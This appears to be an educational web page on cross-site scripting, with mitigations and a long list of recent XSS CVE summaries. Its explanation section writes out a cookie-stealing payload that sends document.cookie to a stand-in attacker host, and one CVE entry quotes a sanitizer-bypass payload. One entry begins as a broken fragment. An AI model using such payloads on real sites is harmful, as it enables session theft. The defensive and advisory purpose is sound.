Cross-Site Scripting
Cross-Site Scripting occurs when an application accepts untrusted data and sends it to a web browser without proper validation or encoding.
How It Works
Cross-Site Scripting occurs when an application accepts untrusted data and sends it to a web browser without proper validation or encoding. The attacker crafts input containing JavaScript code, which the application then incorporates into its HTML response. When a victim's browser renders this response, it executes the injected script as if it were legitimate code from the trusted website.
The attack manifests in three main variants. Reflected XSS occurs when malicious script arrives via an HTTP parameter (like a search query) and immediately bounces back in the response—typically delivered through phishing links. Stored XSS is more dangerous: the payload persists in the application's database (in comment fields, user profiles, forum posts) and executes whenever anyone views the infected content. DOM-based XSS happens entirely client-side when JavaScript code improperly handles user-controllable data, modifying the DOM in unsafe ways without ever sending the payload to the server.
A typical attack flow starts with the attacker identifying an injection point—anywhere user input appears in HTML output. They craft a payload like <script>document.location='http://attacker.com/steal?c='+document.cookie</script> and inject it through the vulnerable parameter. When victims access the page, their browsers execute this script within the security context of the legitimate domain, giving the attacker full access to cookies, session tokens, and DOM content.
Impact
- Session hijacking: Steal authentication cookies to impersonate victims and access their accounts
- Credential harvesting: Inject fake login forms on trusted pages to capture usernames and passwords
- Account takeover: Perform state-changing actions (password changes, fund transfers) as the authenticated victim
- Keylogging: Monitor and exfiltrate everything users type on the compromised page
- Phishing and malware distribution: Redirect users to malicious sites or deliver drive-by downloads from a trusted domain
- Data exfiltration: Access and steal sensitive information visible in the DOM or retrieved via AJAX requests
Real-World Examples
A stored XSS vulnerability in Twitter (2010) allowed attackers to create self-propagating worms. Users hovering over malicious tweets automatically retweeted them and followed the attacker, creating viral spread through the platform's legitimate functionality.
eBay suffered from persistent XSS flaws in product listings (CVE-2015-2880) where attackers embedded malicious scripts in item descriptions. Buyers viewing these listings had their sessions compromised, enabling unauthorized purchases and account takeover.
British Airways faced a sophisticated supply chain attack (2018) where attackers injected JavaScript into the airline's payment page. The script skimmed credit card details from 380,000 transactions, demonstrating how XSS enables payment fraud at massive scale.
Mitigation
- Context-aware output encoding: HTML-encode for HTML context, JavaScript-encode for JS strings, URL-encode for URLs—never use generic escaping
- Content Security Policy (CSP): Deploy strict CSP headers to whitelist script sources and block inline JavaScript execution
- HTTPOnly and Secure cookie flags: Prevent JavaScript access to session cookies and ensure transmission over HTTPS only
- Input validation: Reject unexpected characters and patterns, though this is defense-in-depth, not primary protection
- DOM-based XSS prevention: Use safe APIs like
textContentinstead ofinnerHTML; avoid passing user data to dangerous sinks likeeval()
Recent CVEs (38827)
Stored Cross-Site Scripting in the Orbit Fox WordPress plugin (ThemeIsle) allows authenticated administrators to inject persistent malicious scripts into pages served to any visiting user. Affected are all versions through 3.0.6, but only under specific deployment conditions: WordPress multisite networks or installations where the unfiltered_html capability has been explicitly disabled. No public exploit code has been identified at time of analysis, and the vulnerability is not listed in the CISA KEV catalog. The CVSS score of 4.4 reflects the elevated prerequisites and limited per-incident impact, though scope-changed XSS can still enable session theft and secondary phishing in affected deployments.
Stored Cross-Site Scripting in the bplugins Services Section Block WordPress plugin (all versions through 1.4.4) enables authenticated attackers with contributor-level access to inject persistent malicious scripts via the 'link' block attribute. The payload evades wp_kses_post sanitization by embedding inside HTML comments at save time, then executes from two rendering paths - the primary service link anchor and a secondary title-wrapped anchor - when the linkIn option is set to 'title'. No public exploit has been identified at time of analysis, and the vulnerability is not listed in CISA KEV, but the scope-changed (S:C) nature means injected content executes in any site visitor's browser session, enabling session hijacking or credential theft at scale.
Unauthenticated cross-tenant file upload in Typebot.io chatbot builder versions 3.16.1 and earlier allows anonymous visitors of any published bot containing a file-input block to write attacker-controlled HTML, SVG, or JavaScript into arbitrary subpaths of the shared public S3 bucket. The flaw stems from an unauthenticated presigned-URL endpoint that trusts a raw fileName parameter and does not bind Content-Type, enabling stored XSS on the storage origin and content hosting under other tenants' result paths. No public exploit identified at time of analysis, but the CVSS 9.3 (scope-changed) reflects significant cross-tenant impact.
Reflected XSS in the marimo notebook server before version 0.23.9 enables unauthenticated remote attackers to inject and execute arbitrary JavaScript in the origin of a victim's marimo server by supplying a crafted `file` query parameter. The flaw stems from improper single-quote escaping in assets.py when reflecting the parameter into an inline JavaScript string literal; attackers bypass the server's 404 check by prefixing payloads with `__new__`, and execution occurs without Content-Security-Policy restrictions. No active exploitation is confirmed (not in CISA KEV) and no public exploit code has been identified at time of analysis, though the attack mechanism is straightforward for a motivated attacker targeting shared or collaborative marimo deployments.
DOM-based XSS in Shaarli's Thumbnail Synchronizer allows stored malicious bookmark titles to execute arbitrary JavaScript in an administrator's browser session when thumbnail synchronization is triggered. Versions 0.16.1 and prior are affected; the root cause is unsanitized innerHTML injection in thumbnails-update.js after the backend's ThumbnailsController::ajaxUpdate returns raw, unescaped bookmark titles via AJAX. Successful exploitation can lead to session hijacking, privilege escalation, and backdoor injection against administrator accounts. No public exploit or KEV listing is confirmed at time of analysis; a vendor patch is available in v0.16.2.
Stored XSS in Shaarli's tag filtering functionality permits an authenticated user to inject persistent JavaScript payloads via the bookmark tags field, which execute in the browsers of any user who subsequently interacts with the 'Filter by tag' search feature on the homepage. All Shaarli deployments running version 0.16.1 or earlier are affected, including instances where administrators use the tag-filter feature. The vulnerability enables session hijacking or credential exfiltration against any user who triggers the tag search, with no public exploit code or CISA KEV listing identified at time of analysis. Vendor-released patch v0.16.2 (2026-05-23) resolves the issue.
Stored XSS in Shaarli's Markdown rendering pipeline (versions 0.16.1 and prior) allows an authenticated user to inject malicious javascript: URIs via Markdown reference-style links in bookmark descriptions, bypassing the filterProtocols sanitization method in BookmarkMarkdownFormatter.php. When any user or guest visitor views the crafted bookmark, arbitrary JavaScript executes in their browser context, enabling session theft or unauthorized actions. No public exploit has been identified at time of analysis and this CVE is not listed in CISA KEV; vendor-released patch v0.16.2 is available as of 2026-05-23.
Stored XSS in Filament v3 PHP admin panel framework occurs when a RichEditor form field is rendered in disabled mode, because the disabled view binds raw state via Alpine's x-html directive without HTML sanitization. Authenticated attackers who can write into the underlying field state can plant HTML or JavaScript that executes in the browser of any user later viewing the form, with no public exploit identified at time of analysis and no KEV listing.
Stored cross-site scripting in Gitea 1.25.x affects the built-in 3D file viewer (Online3DViewer integration) where a crafted .gltf file with an unsupported extension name in extensionsRequired is rendered into the DOM via innerHTML without sanitization. Any low-privileged user who can push a file to a repository (including a public fork) can compromise the session of any user who later views the file, enabling token theft and full account takeover. Publicly available exploit code exists (a working PoC is included in the GHSA-9cpj-qc93-vw8v advisory); no public exploit identified at time of analysis in CISA KEV.
Stored cross-site scripting in earmark (the Elixir Markdown-to-HTML library by pragdave) allows any attacker who can submit markdown content to inject arbitrary JavaScript that executes in the browsers of users who view the rendered output. The root cause is a code path in `_make_att1/2` (`lib/earmark/transform.ex`) that splices HTML attribute values verbatim without encoding double-quote characters, enabling a crafted link URL or title to break out of the `href` attribute and inject additional HTML event handlers. Critically, no patched version will be released - the library has been officially retired from Hex - making migration to a maintained alternative the only complete fix. No public exploit identified at time of analysis, though the CVE description itself contains a working proof-of-concept payload.
Stored cross-site scripting in Plane CE 1.3.1 allows an authenticated low-privileged project member to inject arbitrary HTML and JavaScript via the `description_html` field through the API v1 intake endpoint, with payloads persisting in the database and executing in the browsers of any user who views the affected intake item. The CVSS 4.0 vector rates confidentiality impact on the vulnerable system as High (VC:H), reflecting the realistic threat of session token exfiltration from higher-privileged users such as project administrators. No active exploitation has been confirmed and no public exploit code has been identified at time of analysis.
Stored cross-site scripting in Open WebUI versions up to and including 0.9.5 allows any authenticated user holding the default workspace.models permission to embed an SVG payload in a model's profile_image_url and hijack the session of anyone who opens that image URL as a top-level document. The flaw is an incomplete-patch bypass of GHSA-3wgj-c2hg-vm6q and GHSA-3856-3vxq-m6fc - the input validator and the MIME allowlist plus X-Content-Type-Options:nosniff added to the user and webhook endpoints were never applied to ModelMeta or the model image serving endpoint. No public exploit identified at time of analysis beyond the working PoC included in the advisory, and CVSS 7.6 reflects the cross-origin scope change leading to JWT theft and account takeover.
Stored cross-site scripting in Open WebUI up to and including v0.9.5 allows authenticated users to execute arbitrary JavaScript in another user's browser under the application origin by uploading a malicious Markdown file containing a crafted Mermaid diagram. The flaw stems from Mermaid being initialized with securityLevel:'loose' and its SVG output being injected via innerHTML in the file preview panel. Publicly available exploit code exists in the GHSA advisory, but there is no public exploit identified at time of analysis beyond the PoC, and the issue is not listed in CISA KEV.
{event_id}/update` endpoint validates write access only on the source calendar, silently omitting the destination `calendar_id` authorization check that `create_event` correctly enforces - a classic IDOR pattern. A verified public proof-of-concept exists against v0.9.4 (the official Docker image); the fix is available in v0.9.6. No CISA KEV listing was present in the input data, so widespread in-the-wild exploitation is unconfirmed.
Stored Cross-Site Scripting in NocoDB (npm package, versions <= 0.301.3) allows an authenticated user with upload permissions to deliver malicious `.html` or `.svg` attachments that the victim's browser renders inline from the NocoDB origin, bypassing the intended forced-download behavior. The root cause is a header-key case mismatch in the secure attachment handler: the signed URL generator wrote overrides as PascalCase keys while the Express controller read them as lowercase-hyphen keys, silently dropping `Content-Disposition: attachment` and enabling inline rendering. When exploited, script executing in the victim's browser can exfiltrate the auth JWT stored in `localStorage`, leading to full session compromise. No public exploit code has been identified at time of analysis, and no patched version has been confirmed released.
Unauthenticated reflected/stored cross-site scripting in Royal Elementor Addons Pro WordPress plugin versions prior to 1.7.1041 allows remote attackers to inject arbitrary JavaScript that executes in a victim's browser when they interact with a crafted link or page. No public exploit identified at time of analysis, but the unauthenticated nature combined with the popularity of Elementor-ecosystem plugins makes this a credible threat to WordPress sites running the Pro variant. Patchstack disclosure indicates a fixed version is available.
Reflected cross-site scripting in the SweetDate Core WordPress plugin versions prior to 1.1.5 allows unauthenticated remote attackers to execute arbitrary JavaScript in a victim's browser when the victim is lured into clicking a crafted link. The CVSS 3.1 score of 7.1 (AV:N/AC:L/PR:N/UI:R/S:C) reflects unauthenticated network reach with required user interaction and a scope change typical of stored/reflected XSS in browser contexts. No public exploit identified at time of analysis and no EPSS or KEV signal was provided.
Reflected cross-site scripting in the Avante WordPress theme versions prior to 3.0.5 allows unauthenticated remote attackers to inject script that executes in a victim's browser when the victim clicks a crafted link. Reported by Patchstack with CVSS 7.1 (scope-changed), no public exploit identified at time of analysis, but the unauthenticated nature and prevalence of WordPress themes makes this a practical phishing/account-takeover lure against site visitors and logged-in administrators.
Stored XSS in SimplCommerce's news module allows an authenticated administrator to persist arbitrary JavaScript via the ShortContent and FullContent fields of NewsItemApiController, which are stored without HTML sanitization and rendered unencoded through Razor's @Html.Raw() method. Any site visitor who subsequently loads an affected news page will execute the injected script in their browser, enabling session hijacking, credential theft, or malicious redirects. No public exploit code or CISA KEV listing exists at time of analysis; an upstream fix is available at commit 6142d3b5 per Checkmarx's disclosure.
Reflected cross-site scripting in the Themify Folo WordPress theme (versions up to and including 1.9.6) allows remote attackers to execute arbitrary JavaScript in a victim's browser when the victim clicks a crafted link. The flaw is reported by Patchstack with a CVSS 3.1 base score of 7.1 driven by scope change and user interaction; no public exploit identified at time of analysis and the vulnerability is not listed in CISA KEV.
Unauthenticated reflected/stored cross-site scripting in the JetFormBuilder WordPress plugin versions 3.6.0.1 and earlier allows remote attackers to inject script into pages rendered to victims. Exploitation requires a victim to interact with a crafted link or form (UI:R), and successful payload execution can hijack sessions or perform actions in the victim's browser context. No public exploit identified at time of analysis, and the issue is not listed in CISA KEV.
Reflected cross-site scripting in the Ays Pro Popup Box WordPress plugin versions 6.2.9 and earlier allows remote unauthenticated attackers to execute arbitrary JavaScript in a victim's browser when the victim clicks a crafted link. The CVSS 7.1 score reflects scope change (S:C) typical of XSS escaping the plugin context into the broader WordPress session. No public exploit identified at time of analysis, and the issue is not listed in CISA KEV.
Reflected or stored cross-site scripting in the JetEngine WordPress plugin (versions 3.8.10 and earlier) allows remote unauthenticated attackers to inject arbitrary script that executes in a victim's browser after the user is lured to a crafted link or page. The flaw was reported by Patchstack and carries a CVSS 3.1 score of 7.1 with scope change, reflecting impact on the WordPress session context beyond the vulnerable component. No public exploit identified at time of analysis, and the issue is not listed in CISA KEV.
Unauthenticated cross-site scripting in the JetEngine WordPress plugin versions 3.8.10 and earlier allows remote attackers to inject malicious scripts that execute in the browser of any user who interacts with a crafted link or page. The CVSS 7.1 score reflects the scope change inherent to XSS (attacker-supplied JavaScript runs in the victim's site origin), and no public exploit has been identified at time of analysis. Successful exploitation can lead to session hijacking, credential theft, or administrative account takeover on affected WordPress sites.
Stored or reflected cross-site scripting in WPFunnels Pro WordPress plugin versions 2.9.4 and earlier allows unauthenticated remote attackers to inject malicious script that executes in a victim's browser when they interact with crafted content. The CVSS 3.1 score of 7.1 reflects the scope-changed impact (S:C) on the WordPress site, including potential session hijacking of administrators. No public exploit identified at time of analysis and the issue is not listed in CISA KEV.
Unauthenticated reflected/stored cross-site scripting in the JetEngine WordPress plugin (versions <= 3.8.9.1) allows remote attackers to inject malicious script into pages rendered by the plugin, which then executes in the browser of any visitor who interacts with the crafted content. Successful exploitation enables session hijacking, credential theft, or administrative actions performed against logged-in WordPress users including site administrators. No public exploit identified at time of analysis and the issue is not listed in CISA KEV.
Unauthenticated reflected/stored cross-site scripting in the Cozmoslabs Profile Builder Pro WordPress plugin (versions 3.15.0 and earlier) allows remote attackers to inject arbitrary JavaScript that executes in a victim's browser after user interaction. The flaw carries a CVSS 3.1 score of 7.1 with scope change, meaning the injected script can affect resources beyond the vulnerable component (typically the WordPress admin session). No public exploit identified at time of analysis, and the issue is not listed in CISA KEV.
Reflected/stored cross-site scripting in the Kapee WordPress theme versions prior to 1.7.1 allows remote unauthenticated attackers to inject arbitrary script that executes in a victim's browser after user interaction, with a scope change that can impact other components beyond the vulnerable theme. No public exploit identified at time of analysis, but the vulnerability was disclosed via Patchstack with a CVSS of 7.1, reflecting the unauthenticated nature combined with required user interaction.
Unauthenticated reflected/stored cross-site scripting in the Collectchat WordPress plugin versions 2.4.9 and earlier allows remote attackers to inject arbitrary JavaScript that executes in a victim's browser when they interact with a crafted link or page. No public exploit identified at time of analysis, but the unauthenticated nature combined with scope change (S:C) makes this attractive for opportunistic attacks against WordPress sites running the plugin.
Reflected cross-site scripting in the WPZOOM Addons for Elementor WordPress plugin (versions 1.3.4 and earlier) allows unauthenticated remote attackers to inject arbitrary script into a victim's browser session by tricking them into following a crafted link. The flaw was disclosed by Patchstack and carries a CVSS 3.1 score of 7.1 with scope change, reflecting potential impact on the broader WordPress site context; no public exploit identified at time of analysis and the issue is not listed in CISA KEV.
Reflected cross-site scripting in the WPJobster WordPress theme through version 6.3.5 allows unauthenticated remote attackers to execute arbitrary JavaScript in a victim's browser when the victim clicks a crafted link. The flaw carries a CVSS 3.1 score of 7.1 with a scope change (S:C), reflecting impact on browser-side resources beyond the vulnerable application. No public exploit identified at time of analysis and the issue is not listed in CISA KEV, but Patchstack has catalogued it as a confirmed reflected XSS.
Reflected cross-site scripting in the Skillate WordPress theme versions 1.2.10 and below allows remote unauthenticated attackers to inject arbitrary JavaScript that executes in a victim's browser when they interact with a crafted link. The flaw carries a CVSS 3.1 score of 7.1 with scope change (S:C), reflecting that the injected script runs in the WordPress site context and can pivot against authenticated users including administrators. No public exploit identified at time of analysis, and the issue is not listed in CISA KEV.
Reflected cross-site scripting in the VamTam Auto Repair WordPress theme versions 22.6 and earlier allows remote unauthenticated attackers to execute arbitrary JavaScript in a victim's browser after tricking them into clicking a crafted link. The flaw was disclosed via Patchstack and carries a CVSS 7.1 due to scope change impact on the WordPress admin context; no public exploit identified at time of analysis and the vulnerability is not listed in CISA KEV.
Reflected or stored cross-site scripting in the Sonaar WordPress theme versions 4.27.4 and earlier allows remote unauthenticated attackers to inject malicious script into pages rendered to victims who follow a crafted link or interact with attacker-controlled content. The CVSS scope-change vector (S:C) indicates the injected script can impact resources beyond the vulnerable component, such as the WordPress admin session of a logged-in user. No public exploit identified at time of analysis, and the issue is not on CISA's KEV list.
Unauthenticated Cross Site Scripting (XSS) in my flatonica <= 0.0.8 versions. Rated high severity (CVSS 7.1), this vulnerability is remotely exploitable, no authentication required, low attack complexity. No vendor patch available.
Stored cross-site scripting in Teldat's Regesta Smart HD-PLC (TLDPH16D2, firmware 11.02.05.10.02) allows a privileged, authenticated attacker to inject arbitrary JavaScript into the device's 'Hostname' configuration field, which executes in the browser of any user who subsequently loads the `/upgrade/query.php?cmd=p+3%3Bversion` endpoint. The CVSS 4.0 score of 4.8 reflects meaningful constraints: high-privilege access (PR:H) is required to write the malicious configuration, and victim user interaction (UI:P) is needed to trigger execution. No public exploit identified at time of analysis and not listed in CISA KEV; a vendor patch is available.
Stored Cross-Site Scripting in the Permalink Manager Lite WordPress plugin (all versions through 2.5.3.3) allows authenticated contributors to inject persistent JavaScript into the admin URI Editor interface via crafted post titles. The payload executes in the browser of any administrator who subsequently visits the Permalink Manager page, enabling session hijacking or unauthorized admin-level actions. No active exploitation is confirmed in CISA KEV, and no public exploit code has been identified at time of analysis; vendor-released patch 2.5.3.4 is available.
Stored XSS in the myCred WordPress plugin (versions up to and including 3.1) allows authenticated attackers holding contributor-level access or above to inject persistent JavaScript payloads via the unsanitized 'wrap' shortcode attribute in the leaderboard shortcode handler. When any user - including administrators - visits a page containing the injected shortcode, the payload executes in their browser, enabling session hijacking or privilege escalation. No public exploit or CISA KEV listing has been identified at time of analysis; fix is available in version 3.1.1 as confirmed by WordPress plugin trac changeset 3572451.
The Taskbuilder WordPress plugin before 5.0.8 does not properly sanitise a URL parameter before echoing it into inline JavaScript on a frontend page containing one of its shortcodes, leading to a Reflected Cross-Site Scripting vulnerability that can be triggered against any logged-in user.
The weMail: Email Marketing, Email Automation, Newsletters, Subscribers & Email Optins for WooCommerce WordPress plugin before 2.1.3 does not properly escape a user-supplied parameter before reflecting it into an HTML attribute on a non-nonce-protected AJAX response, allowing unauthenticated attackers to deliver Reflected Cross-Site Scripting against any authenticated user (including administrators) via a crafted URL.
The WP Magnific Popup WordPress plugin through 1.0 does not properly escape user-controlled link URLs before injecting them into the DOM when displaying image load error messages, allowing authenticated attackers with Author-level access or above to perform Stored Cross-Site Scripting attacks against any visiting user.
Universal Cross-Site Scripting (UXSS) in the Views component of Google Chrome on Linux (prior to 149.0.7827.155) enables an attacker who has already compromised the renderer process to inject arbitrary scripts or HTML across security origins via a crafted HTML page, breaking Chrome's same-origin policy isolation. This is a post-renderer-compromise escalation step in a multi-stage attack chain, Linux-platform specific, requiring prior renderer RCE as a prerequisite. No public exploit code has been identified at time of analysis; EPSS sits at 0.29% (21st percentile), and CISA SSVC assesses exploitation status as none with partial technical impact.
Inappropriate implementation in Serial in Google Chrome prior to 149.0.7827.155 allowed a remote attacker to inject arbitrary scripts or HTML (UXSS) via a crafted HTML page. (Chromium security severity: High)
Stored XSS in the HTML session export feature of pi-coding-agent allows script execution in an exported document when a user clicks a crafted Markdown link. Affected npm packages (@mariozechner/pi-coding-agent 0.27.5–0.73.1 and @earendil-works/pi-coding-agent 0.74.0–0.78.0) either omitted URL scheme validation entirely or implemented a blocklist that could be defeated by prepending C0 control characters (bytes 0x00–0x1F), which browsers silently strip before navigation. No public exploit is identified at time of analysis and this vulnerability is not in CISA KEV; the CVSS score of 2.5 and local attack vector reflect the multi-step, user-dependent exploitation chain discovered and responsibly disclosed by CrowdStrike researchers.
Stored cross-site scripting in n8n workflow automation platform allows authenticated users with workflow edit permissions to inject arbitrary JavaScript via the Chat Trigger node's webhookId parameter. When a logged-in user visits the chat URL, the injected code executes in the n8n origin with the victim's session privileges, enabling account takeover. No public exploit identified at time of analysis, but a vendor-released patch is available.
Reflected XSS in n8n's Facebook (Meta), WhatsApp, and Microsoft Teams webhook trigger nodes allows an attacker to execute arbitrary JavaScript in an authenticated user's browser by luring them to a crafted URL targeting the vulnerable webhook verification endpoints. Affected are all n8n deployments running version < 2.24.0 with any of the four vulnerable trigger nodes active; the CVSS scope change (S:C) means successful exploitation extends beyond the n8n component itself, enabling session hijacking or theft of API credentials stored in workflows. No public exploit code or CISA KEV listing has been identified at time of analysis; a vendor-released patch is confirmed in n8n 2.24.0.
Stored/reflected XSS in Remark42 self-hosted comment engine versions 1.6.0 through 1.15.0 allows unauthenticated remote attackers to execute arbitrary JavaScript in the context of a Remark42 origin by abusing a Content-Type inconsistency in the image proxy. The proxy trusts the upstream Content-Type header during the download check but re-sniffs bytes when serving, letting an HTML/JS payload advertised as image/png be re-served as text/html from the victim instance's own origin. No public exploit identified at time of analysis; fixed in 1.16.0.
The `stripHTML` template function in Caddy web server can be bypassed with malformed HTML input such as `<<>img src=x onerror=alert()>`, allowing injected HTML tags to survive sanitization and reach the browser as executable markup, resulting in client-side XSS. Affected versions are Caddy v2 <= 2.11.3 and Caddy v1 <= 1.0.5; exploitation requires the templates middleware to be active and untrusted input to be processed via `stripHTML` and rendered without further escaping. A publicly available proof-of-concept exists per the GitHub security advisory GHSA-vcc4-2c75-vc9v; no active exploitation is confirmed in CISA KEV at time of analysis.
Reflected cross-site scripting in the Enfold WordPress theme versions up to and including 7.1.4 allows remote unauthenticated attackers to execute arbitrary JavaScript in a victim's browser when the user is lured into clicking a crafted link. The CVSS scope change (S:C) and Low impact across C/I/A indicate the injected script can affect components beyond the vulnerable theme component, typically the authenticated WordPress session. No public exploit identified at time of analysis, though Patchstack's disclosure provides enough detail for skilled researchers to reproduce.
Reflected cross-site scripting in the MagOne WordPress theme versions 9.0 and earlier allows remote unauthenticated attackers to inject arbitrary script into a victim's browser session when the victim is lured to a crafted link. CVSS rates this 7.1 with a scope change (S:C), reflecting the ability to affect resources beyond the vulnerable component such as the authenticated WordPress session. No public exploit identified at time of analysis, but Patchstack has published the advisory in their WordPress vulnerability database.
Reflected/unauthenticated cross-site scripting in the ThemeGoods Grand Car Rental WordPress theme versions 3.7 and earlier lets remote attackers execute arbitrary JavaScript in a victim's browser session after the victim follows a crafted link or visits a malicious page. The flaw carries a CVSS 3.1 base score of 7.1 with scope change, indicating impact beyond the vulnerable component, and no public exploit identified at time of analysis. Disclosure is coordinated through Patchstack and tracked as EUVD-2025-210174.
Reflected/stored cross-site scripting in the Qreatix WordPress theme (versions 1.9.4 and earlier) allows remote unauthenticated attackers to inject arbitrary script that executes in a victim's browser after the victim interacts with a crafted link or page. The flaw is reported by Patchstack and tracked as EUVD-2025-210188; no public exploit identified at time of analysis and no CISA KEV listing. CVSS scope-change rating (7.1) reflects impact on a separate security authority - typically the WordPress admin session of a logged-in user lured to the payload.
Universal cross-site scripting (UXSS) in Adobe Acrobat PDF Extension for Chrome (versions 26.5.2.2 and earlier) allows remote attackers to disclose cross-origin session data when a victim visits a malicious URL or interacts with a compromised page. The CVSS 3.1 vector AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:N/A:N indicates high confidentiality impact across security boundaries, and no public exploit identified at time of analysis. The flaw is browser-extension scoped, so impact is limited to users who have installed this Chrome extension.
Address bar spoofing in The Browser Company's Arc Search for Android allows remote attackers to render attacker-controlled content beneath a legitimate-looking URL in the address bar, enabling high-fidelity phishing against mobile users. The flaw maps to CWE-1021 (improper restriction of rendered UI layers) and carries a CVSS 7.4 due to the integrity impact on user trust decisions, though successful exploitation requires user interaction. No public exploit identified at time of analysis, but a HackerOne report (#3705306) suggests reproducible POC details exist within the disclosure program.
Takeover of Oracle Human Resources in Oracle E-Business Suite versions 12.2.3 through 12.2.15 is possible when a remote unauthenticated attacker tricks a separate user into interacting with a crafted HTTP request targeting the Person component. Despite high attack complexity, successful exploitation yields full confidentiality, integrity, and availability impact on the HR module. No public exploit identified at time of analysis.
Remote takeover of Oracle Enterprise Manager Base Platform 13.5 and 24.1 is possible when an unauthenticated attacker over HTTP coerces a victim user into interacting with a crafted request targeting the Metadata Plugin component. The flaw is scope-changing and yields full confidentiality, integrity, and availability impact on the platform and potentially adjacent products. No public exploit identified at time of analysis, and the issue is not currently listed in CISA KEV.
Cross-scope takeover of Oracle Enterprise Manager Base Platform 13.5 and 24.1 allows unauthenticated remote attackers to fully compromise the management platform - and potentially additional managed products - by tricking an authenticated user into interacting with a malicious HTTP-delivered payload targeting the Metadata Plugin component. The CVSS 3.1 base score is 9.6 with a scope change reflecting impact beyond the vulnerable component, and at time of analysis no public exploit identified at time of analysis. Because Oracle Enterprise Manager centrally controls fleets of Oracle databases, middleware, and infrastructure, successful exploitation has outsized blast-radius implications for downstream Oracle estates.
Stored cross-site scripting in Hugo's content pipeline affects all versions prior to v0.162.0 when the site ingests HTML content from untrusted sources. Hugo emitted the body of any content file mapped to the text/html media type verbatim into the rendered output, making sites backed by CMS editors, external content adapters, or automated import pipelines potential XSS delivery vehicles to end users. No public exploit code has been identified at time of analysis and the vulnerability is not listed in CISA KEV, but the risk is material for any Hugo deployment that does not fully trust every source populating the /content directory or content adapter pipeline.
Same-origin cross-site scripting in n8n workflow automation platform allows an authenticated user with workflow edit privileges to weaponize the Respond to Webhook node and execute JavaScript in another authenticated user's session. The binary response path bypassed the central Content-Security-Policy sandbox header, letting attacker-controlled Content-Type serve executable content from the n8n origin. No public exploit identified at time of analysis, and the flaw is not listed in CISA KEV.
Reflected cross-site scripting in PowerSchool Employee Access Center 23.10 allows unauthenticated remote attackers to execute arbitrary JavaScript in the browser context of any user who clicks a crafted login URL, with injected code evaluated directly via eval(). Reported by Palo Alto Networks Unit 42 (PANW-2026-0002), exploit code has been publicly released (CVSS 4.0 E:P), meaningfully lowering the barrier to exploitation. No active exploitation has been confirmed in CISA KEV at time of analysis, but the low-barrier phishing delivery path targeting an education-sector HR authentication page - with high subsequent-system impact - warrants treatment above the Medium CVSS 4.0 score of 5.7 implies.
Stored cross-site scripting in OpenClaw's session HTML export feature allows unsafe javascript: and data: URI schemes to survive into generated output files. All OpenClaw versions before 2026.5.12 are affected; exploitation requires a trusted operator to open an exported session HTML file and actively click a crafted link, at which point arbitrary JavaScript executes in their browser context. No public exploit has been identified at time of analysis and no CISA KEV listing exists; the CVSS 4.0 score of 2.1 reflects the narrow attack prerequisites and limited subsequent-system impact.
PowerStore contains a Stored Cross-Site Scripting Vulnerability in the PowerStore Manager. Rated medium severity (CVSS 5.4), this vulnerability is remotely exploitable, low attack complexity. This Cross-Site Scripting (XSS) vulnerability could allow attackers to inject malicious scripts into web pages viewed by other users.
Cross-site scripting in Astro's server-side rendering pipeline allows injection of arbitrary HTML attributes and event handlers when the spread syntax `{...props}` is used with untrusted object keys. All Astro deployments — SSR, SSG, and hybrid — are affected when application code spreads props sourced from external APIs, CMS responses, or URL parameters onto HTML elements. A functional public proof-of-concept demonstrates session cookie theft via injected `onmousemove` event handlers; no active exploitation has been confirmed in CISA KEV at time of analysis.
Reflected cross-site scripting in Astro framework (versions prior to 6.3.3) allows remote attackers to inject arbitrary HTML and execute JavaScript in victim browsers when an SSR-rendered page passes user-controlled input as a slot name to a component using a client:* directive. The flaw lives in the server renderer, which interpolates the slot name into a data-astro-template attribute without HTML escaping, enabling attribute-context breakout. No public exploit identified at time of analysis beyond the reporter's PoC in the GHSA advisory, and the issue is not listed in CISA KEV.
Spoofing via CWE-1021 (UI layer restriction failure) in Mozilla Firefox's DOM Core & HTML component allows remote unauthenticated attackers to render deceptive UI content in a victim's browser when they interact with a malicious web page. All Firefox versions prior to 152 are affected. No public exploit has been identified at time of analysis, and CISA SSVC assessment classifies exploitation status as none with partial technical impact, placing real-world urgency below the moderate CVSS score suggests.
Clickjacking issue in the Widget: Gtk component. This vulnerability was fixed in Firefox 152.
Reflected cross-site scripting in the Media Library Assistant WordPress plugin (versions up to and including 3.35) allows unauthenticated remote attackers to inject script that executes in a victim's browser after a user-interaction event (clicking a crafted link). Per Patchstack, the issue affects David Lingren's plugin and currently has no public exploit identified at time of analysis, but the CVSS 7.1 (scope-changed) reflects that successful execution can pivot into authenticated admin contexts.
Unauthenticated reflected/stored cross-site scripting in the Pods WordPress plugin (versions 3.3.8 and earlier) allows remote attackers to inject malicious script that executes in a victim's browser when they visit a crafted page or link. The flaw requires user interaction (UI:R) and carries a scope change (S:C), letting injected payloads steal session data or perform privileged actions in the WordPress admin context. No public exploit identified at time of analysis, but the unauthenticated nature and broad WordPress plugin install base make this a meaningful risk for site operators.
Reflected cross-site scripting in the WPFactory 'Min Max Step Quantity Limits Manager for WooCommerce' WordPress plugin (versions 5.2.2 and earlier) allows unauthenticated remote attackers to execute arbitrary JavaScript in a victim's browser after the victim clicks a crafted link. The CVSS 3.1 score of 7.1 is elevated by a scope change (S:C), reflecting that script execution can affect the WordPress admin context, but exploitation requires user interaction (UI:R). No public exploit was identified at time of analysis and the issue is not listed in CISA KEV.
Stored Cross-Site Scripting in the WordPress 'File Sharing & Download Manager - User Private Files' plugin (all versions through 2.1.6) allows authenticated attackers with subscriber-level access to persistently inject malicious JavaScript via the 'fldr_ttl' (folder title) parameter. The payload is stored server-side and executes in the browsers of any user who subsequently visits an affected page, enabling session hijacking, credential theft, or malicious redirects. No public exploit or CISA KEV listing exists at time of analysis, but low privilege requirements (subscriber-level) expand the attacker pool significantly on sites with open registration.
Reflected XSS in Slim PHP framework (versions 4.4.0 through 4.15.1) allows attackers to inject arbitrary HTML and JavaScript into HTML error pages when application code passes request-derived data into HttpException::setTitle() or setDescription(). The payload executes in a victim's browser upon rendering the crafted error page, and critically this occurs even when displayErrorDetails is set to false, since the unescaped values are rendered on a separate code path. No public exploit code or CISA KEV listing has been identified; exploitation is scoped to applications that explicitly feed untrusted input into these specific exception setter methods.
Cross-site scripting in the SEO Redirection WordPress plugin (versions <= 9.17) allows remote unauthenticated attackers to inject malicious scripts that execute in a victim's browser after user interaction such as clicking a crafted link. The flaw has a CVSS 3.1 score of 7.1 with scope-changed impact, indicating injected scripts can affect resources beyond the vulnerable component. There is no public exploit identified at time of analysis, and the vulnerability is not listed in CISA KEV.
